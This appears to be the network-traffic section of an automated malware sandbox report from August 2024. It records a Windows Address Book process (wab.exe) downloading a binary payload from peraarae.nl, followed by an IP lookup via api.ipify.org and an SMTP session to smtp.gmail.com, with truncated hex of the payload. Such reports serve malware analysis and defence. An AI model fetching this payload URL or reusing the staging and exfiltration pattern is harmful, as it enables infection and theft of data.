Aug 29, 2024 12:24:48.435847998 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.435904026 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.435930014 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.435978889 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.436108112 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.436109066 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.436109066 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.436269999 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.600621939 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.600730896 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.600811958 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.600816965 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.600909948 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.600982904 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.600984097 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.600985050 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.601073980 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.601142883 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.601171017 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.601207018 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.601243019 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.601346016 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.601387024 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.601387978 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.601433039 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.601512909 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.601555109 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.601555109 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.601587057 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.601663113 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.601721048 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.601735115 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.601814985 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.601872921 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.601896048 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.601959944 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.602029085 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.602061987 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.602061987 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.602116108 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.602185965 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.602229118 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.602257967 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.602332115 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.602406025 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.602406025 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.602406025 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.602428913 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.602519989 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.602576017 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.602600098 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.602679014 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.602740049 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.602746964 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.602747917 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.602747917 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.602833033 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.602900028 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.602910995 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.602986097 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.603049040 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.603080988 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.603080988 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.603132010 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.603200912 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.603260994 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.603260994 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.603271961 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.603352070 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.603419065 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.603420019 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.603420973 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.603523016 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.603598118 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.603599072 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.603617907 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.603696108 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.603758097 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.603765965 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.603765965 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.603846073 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.603905916 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.603936911 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.603938103 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.603991985 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.604064941 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.604104996 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.604105949 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.604125023 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.604274035 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.604274988 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.604438066 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:50.624665022 CEST	49843	443	192.168.11.20	104.26.12.205
Aug 29, 2024 12:24:50.624685049 CEST	443	49843	104.26.12.205	192.168.11.20
Aug 29, 2024 12:24:50.624917984 CEST	49843	443	192.168.11.20	104.26.12.205
Aug 29, 2024 12:24:50.642031908 CEST	49843	443	192.168.11.20	104.26.12.205
Aug 29, 2024 12:24:50.642044067 CEST	443	49843	104.26.12.205	192.168.11.20
Aug 29, 2024 12:24:50.861922979 CEST	443	49843	104.26.12.205	192.168.11.20
Aug 29, 2024 12:24:50.862096071 CEST	49843	443	192.168.11.20	104.26.12.205
Aug 29, 2024 12:24:50.863775969 CEST	49843	443	192.168.11.20	104.26.12.205
Aug 29, 2024 12:24:50.863787889 CEST	443	49843	104.26.12.205	192.168.11.20
Aug 29, 2024 12:24:50.864065886 CEST	443	49843	104.26.12.205	192.168.11.20
Aug 29, 2024 12:24:50.891908884 CEST	49843	443	192.168.11.20	104.26.12.205
Aug 29, 2024 12:24:50.936178923 CEST	443	49843	104.26.12.205	192.168.11.20
Aug 29, 2024 12:24:51.119833946 CEST	443	49843	104.26.12.205	192.168.11.20
Aug 29, 2024 12:24:51.119951010 CEST	443	49843	104.26.12.205	192.168.11.20
Aug 29, 2024 12:24:51.120335102 CEST	49843	443	192.168.11.20	104.26.12.205
Aug 29, 2024 12:24:51.122718096 CEST	49843	443	192.168.11.20	104.26.12.205
Aug 29, 2024 12:24:53.432931900 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:53.433056116 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:53.669774055 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:24:53.787556887 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:53.787753105 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:24:54.010840893 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:54.011126995 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:24:54.129091024 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:54.139844894 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:54.140108109 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:24:54.262428999 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:54.265098095 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:54.265499115 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:24:54.384344101 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:54.384358883 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:54.384411097 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:54.384434938 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:54.384511948 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:24:54.384560108 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:24:54.387073994 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:24:54.504956007 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:54.507900000 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:24:54.630431890 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:54.632827044 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:54.633426905 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:24:54.756501913 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:54.758424997 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:54.758727074 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:24:54.881484985 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.022644997 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.022937059 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:24:55.140899897 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.148011923 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.148313046 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:24:55.271450996 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.273760080 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.274027109 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:24:55.396413088 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.548815012 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.551326990 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:24:55.551326990 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:24:55.551326990 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:24:55.551373005 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:24:55.551623106 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:24:55.551697969 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:24:55.551731110 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:24:55.669449091 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.669480085 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.669502020 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.669584990 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.669603109 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:24:55.669743061 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:24:55.669853926 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.669883966 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.669905901 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.669981003 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.669989109 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:24:55.670008898 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.670094967 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.670118093 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.670162916 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:24:55.670162916 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:24:55.670254946 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.670327902 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:24:55.670430899 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.670523882 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:24:55.787441969 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.787555933 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.787781954 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.787900925 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.788031101 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.788120031 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.788129091 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.788304090 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.788314104 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:55.788382053 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:56.416882038 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:24:56.463006020 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:26:33.582690954 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:26:33.700808048 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:26:33.707943916 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:26:33.708008051 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:26:33.708372116 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:26:33.708615065 CEST	49844	587	192.168.11.20	172.253.62.108
Aug 29, 2024 12:26:33.826770067 CEST	587	49844	172.253.62.108	192.168.11.20
Aug 29, 2024 12:26:37.472119093 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:26:37.878056049 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:26:38.690464973 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:26:40.299432039 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:26:43.517491102 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:26:49.953571081 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:27:02.825788021 CEST	49842	80	192.168.11.20	104.153.208.178

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 29, 2024 12:24:47.488473892 CEST	64090	53	192.168.11.20	1.1.1.1
Aug 29, 2024 12:24:47.596889019 CEST	53	64090	1.1.1.1	192.168.11.20
Aug 29, 2024 12:24:50.517416000 CEST	60939	53	192.168.11.20	1.1.1.1
Aug 29, 2024 12:24:50.621104002 CEST	53	60939	1.1.1.1	192.168.11.20
Aug 29, 2024 12:24:53.565211058 CEST	60083	53	192.168.11.20	1.1.1.1
Aug 29, 2024 12:24:53.669096947 CEST	53	60083	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 29, 2024 12:24:47.488473892 CEST	192.168.11.20	1.1.1.1	0xec95	Standard query (0)	peraarae.nl	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:24:50.517416000 CEST	192.168.11.20	1.1.1.1	0x609a	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:24:53.565211058 CEST	192.168.11.20	1.1.1.1	0x3d0f	Standard query (0)	smtp.gmail.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Aug 29, 2024 12:24:47.596889019 CEST	1.1.1.1	192.168.11.20	0xec95	No error (0)	peraarae.nl	104.153.208.178	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:24:50.621104002 CEST	1.1.1.1	192.168.11.20	0x609a	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:24:50.621104002 CEST	1.1.1.1	192.168.11.20	0x609a	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:24:50.621104002 CEST	1.1.1.1	192.168.11.20	0x609a	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:24:53.669096947 CEST	1.1.1.1	192.168.11.20	0x3d0f	No error (0)	smtp.gmail.com	172.253.62.108	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

peraarae.nl

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49842	104.153.208.178	80	2640	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:24:47.767525911 CEST	172	OUT	GET /ViaMYxizkt11.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: peraarae.nl Cache-Control: no-cache
Aug 29, 2024 12:24:47.935977936 CEST	1289	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:24:47 GMT Server: Apache Last-Modified: Thu, 29 Aug 2024 02:31:12 GMT Accept-Ranges: bytes Content-Length: 249920 Content-Type: application/octet-stream Data Raw: 42 2d 1d c3 68 38 c3 6f 99 8c be 56 69 9d dd 92 96 80 ae f3 dd 86 43 57 36 4f f7 18 f1 fa 96 77 3c 02 8a 67 d4 0f ac e7 b3 e3 cc c4 b1 01 31 a7 6d 05 d2 84 4e ca 7f a2 36 c0 5f 0d 28 37 b8 76 6e 80 4b d4 34 6f ae 14 32 0e 29 33 15 16 a2 58 01 13 4d 23 40 88 f7 31 38 77 b5 d4 00 3b 80 31 b3 13 3e 7d 10 c3 26 41 7f 48 53 7d 70 43 0b 11 f6 f2 8f de e3 8b 00 3d 0e 45 81 17 af 6f f9 96 04 01 12 d2 2b cb e4 5a 15 96 0c db 29 c3 86 98 0c 5a 1b 73 9c 24 13 92 79 bf 03 4d a0 cc 86 b7 d3 fe 40 c8 49 2b 3a a2 0d 49 dd c4 42 d6 1b d0 1d b7 4b 08 ab b5 c7 2c 34 7c f8 16 8b b2 ce f2 e6 9e 20 b2 43 c0 bc fc 86 31 99 ae fb 2f ac 19 c0 cd 53 ee 58 9b 94 5f ab 46 95 e8 fb e8 9a a8 52 ae e0 38 9a d6 cd 3c 30 f8 63 5f 4e f6 2e 78 c3 40 c9 92 b9 bc 79 f3 c7 c8 43 51 99 ef 19 16 f8 f6 f6 f6 0a fe c5 70 08 44 ed bb ab 28 78 1c be f1 b3 a6 81 80 21 8e 20 97 ac b2 ba 40 90 01 73 7f ca d6 5f 8d 9b 51 e0 bd b7 42 86 d5 b8 1d a7 3d fb e8 88 2f 54 d2 fd ad c8 55 3b b2 34 80 5b 27 0d 3c 83 d6 d9 0e 65 80 40 ea 99 38 47 63 02 d6 [TRUNCATED] Data Ascii: B-h8oViCW6Ow<g1mN6_(7vnK4o2)3XM#@18w;1>}&AHS}pC=Eo+Z)Zs$yM@I+:IBK,4\| C1/SX_FR8<0c_N.x@yCQpD(x! @s_QB=/TU;4['<e@8Gc#<\|Rf,zc:>%!q&23P\'RZcJ\|(QzT^a'4V:L9P/:cP\|y=`Qi-Z+TCq-LUuW4&&ufO\),i?xQTrtid._zY_52sB/36j.!713C5Hnt[+t-JjJVOD{YPLv-g8Ur}A_gq-Mr\|jBtKiLe2S?j?E}~ [,>^rER6u9bmd~y4+MwMOUGLKec3Mk.-[sUMMT9mg4&/y]?]c7s92A4;_6~Dv-Kl1;(xnYr3jO~YmeA'!8Cy#08UxE>k5Pb,an?"Y\|[/SqGz [TRUNCATED]
Aug 29, 2024 12:24:47.936077118 CEST	1289	IN	Data Raw: 1b 85 9e 3a fd cf c8 9a 84 89 6a b5 b7 11 8a 63 86 a6 e8 33 11 24 d4 5e 59 dc cf 9c 7b 8f 3e 10 21 fd 00 ff 8e 09 a9 2a e2 05 ba 58 b0 8d 5c c7 59 11 e2 bd 1f 2f cd f6 8b da f8 93 ba 46 bf 75 b4 35 59 5b 59 eb d3 20 18 6f 0b de b7 0e 15 b6 d4 ca Data Ascii: :jc3$^Y{>!*X\Y/Fu5Y[Y oZ6`e%7k4uR3z0X@2_11>"='WIy7X!_+D.Eh4qi,Ok$ot\|8?&<'O)6p'&ve PQ-b#
Aug 29, 2024 12:24:47.936101913 CEST	1289	IN	Data Raw: 61 03 19 01 ed 36 eb e0 18 d6 09 64 c3 8a fb d8 a7 d4 20 df 6a 71 4f bc 05 dd b3 e4 00 b3 56 f2 0b 78 2f 6d 81 92 e8 24 13 01 58 16 8b b6 e4 b8 b4 f3 33 b2 0f cb bd 8e 79 6b ff b8 d3 2e ad 19 c6 e7 4d ec c3 3a 96 5e a4 6d bc ea f8 53 38 a8 52 a2 Data Ascii: a6d jqOVx/m$X3yk.M:^mS8Rr<Nb-.F'JCQ;T:l"zn &wU\8Q7~TU=*g<f9m)0<N-\|i8%!r[\2R
Aug 29, 2024 12:24:47.936148882 CEST	1289	IN	Data Raw: 36 fb 9e c3 0e 38 fe f4 db 0d 18 61 44 ea db 17 59 61 79 34 23 e5 38 f6 e6 94 7f 2f 14 a4 66 c6 06 1f 78 38 4f 3a d9 3a 0f 03 b8 e6 f0 7b 71 26 fd 18 d8 b6 cc 37 b1 33 b8 25 9b de a7 d6 72 50 0c cd 9a e4 17 cc b0 27 52 5e 49 68 8d 7f 7a 7a 09 ae Data Ascii: 68aDYay4#8/fx8O::{q&73%rP'R^Ihzz@(sqgTTtWI/V07?ze<.~Gd3}aRi)X%)RMs/LSxW2$UuLm&g\srcvsCgn>
Aug 29, 2024 12:24:47.936338902 CEST	1289	IN	Data Raw: 9e 14 da b0 ce ac 89 67 57 1b 0f 20 d0 75 87 57 ca 28 87 26 b8 5c 1d 75 e4 46 4d 1c 84 5b b7 66 b3 04 86 ab ef e8 31 be d9 5e e9 52 92 0b e7 aa 7c 63 9f 86 45 78 9c 8a b7 f9 f7 69 c0 4a 65 2a d4 17 8d a9 cd 17 bd aa 2a 30 31 d8 8a d8 29 5e 5f 0e Data Ascii: gW uW(&\uFM[f1^R\|cExiJe**01)^_m>q6k)N71C9HNt[t-jjJO{YPM<s0 LA7YXbGa196`t{1ZRFHV,
Aug 29, 2024 12:24:47.936363935 CEST	1289	IN	Data Raw: 4f f5 23 b4 a9 86 24 90 21 a6 80 59 66 b1 55 c9 61 9d c3 a8 92 31 96 2b c7 fc 39 3a b8 76 12 f4 94 13 44 94 ad 40 c8 4d 6b 1a 7b 30 4b 9d 11 52 bb c9 c9 47 92 ae d0 53 e5 4e a8 d7 26 ea 07 eb 9a e3 98 2f 8f d4 e1 49 bd d7 0b d5 8e a9 13 11 c0 65 Data Ascii: O#$!YfUa1+9:vD@Mk{0KRGSN&/Ie!u;t%"*b3/b?r{[(2$G=a>&hnyO8&Zrl_MTgl:&H{]?21vA2)A46/~+S O-KlOV8!
Aug 29, 2024 12:24:47.936438084 CEST	1289	IN	Data Raw: 29 46 55 4d f0 b3 5a 38 c4 4d c9 f8 06 34 0a 28 6b 79 5d c1 3e 60 9b 17 7e fc f3 73 b9 33 30 88 9b 41 34 c5 15 84 ec 16 a5 19 d1 aa ac 7d 45 ff 23 72 0a b8 8e 96 2d 29 88 8e 4b 6c b1 b0 d2 a6 6f a5 34 27 1e c8 0a b0 af aa f1 08 16 fd 1f 12 da 93 Data Ascii: )FUMZ8M4(ky]>`~s30A4}E#r-)Klo4'c=,hx=?kW3\[G>Vrp3V1gz#O=&=q(qw[-0.ZWePS92F&q2l*JeNfnYV_J7
Aug 29, 2024 12:24:47.936533928 CEST	1289	IN	Data Raw: 47 d2 a9 d1 30 bb c3 d0 56 1c 66 76 25 f9 65 c4 22 60 30 d3 60 62 af 25 9d 46 26 4e ad 17 71 e1 05 30 6c ea 0a bb 8a 66 f6 48 bb e0 fc ca e8 04 7b 83 97 12 66 31 ab 0d cc b8 ef f2 ef 4e 3b a5 5e 4a 28 9b b0 38 08 4b a5 10 46 91 b7 c8 64 88 8a 6a Data Ascii: G0Vfv%e"`0`b%F&Nq0lfH{f1N;^J(8KFdjg~.$Wp~8\EFE^ 'Y\~O&M6j/<o.MI1Xw3]&AFP}p<7X/>+4.
Aug 29, 2024 12:24:47.936645985 CEST	1289	IN	Data Raw: 6a 2a 33 9a c1 e0 58 b9 19 cd 3b 40 88 f3 43 05 75 b5 a4 28 7a 80 31 b9 93 27 7d 10 c7 54 29 7c 48 23 55 32 43 0b 1b 76 e8 8f de e7 f9 52 3e 0e 35 a9 56 2f 6f f3 16 11 1e a8 d8 59 0f ee 97 44 ae 11 97 e4 e6 a0 7e 66 29 4b 83 f3 4b 74 e4 6a 6c 20 Data Ascii: j3X;@Cu(z1'}T)\|H#U2CvR>5V/oYD~f)KKtjl ."P#jY?L2 tKnmJ\|d AxF/S^NQ8<c_>VxDIsCUvpW;~! R@vQB;$=QU
Aug 29, 2024 12:24:47.936712027 CEST	1289	IN	Data Raw: f9 39 e6 47 51 b9 e8 19 16 fc 08 f8 fa 0a fe 3b 7c 00 44 cd b1 ab 28 78 e2 bf 88 b9 a6 81 82 19 23 21 97 ac 92 b3 40 d0 84 8d 71 d6 d6 5f 63 97 5d e0 9d bc 42 86 c5 46 1c 9e 1a fb e8 98 d1 59 d4 fd d6 8b 55 3b b6 14 81 7f c3 0e 65 f4 d7 d9 0e 65 Data Ascii: 9GQ;\|D(x#!@q_c]BFYU;ee=F# \f< zc:> q69BP7+^ZCD\|hh,QxTa/srV:@H/n"\|h;y<_)i4Z'zHU
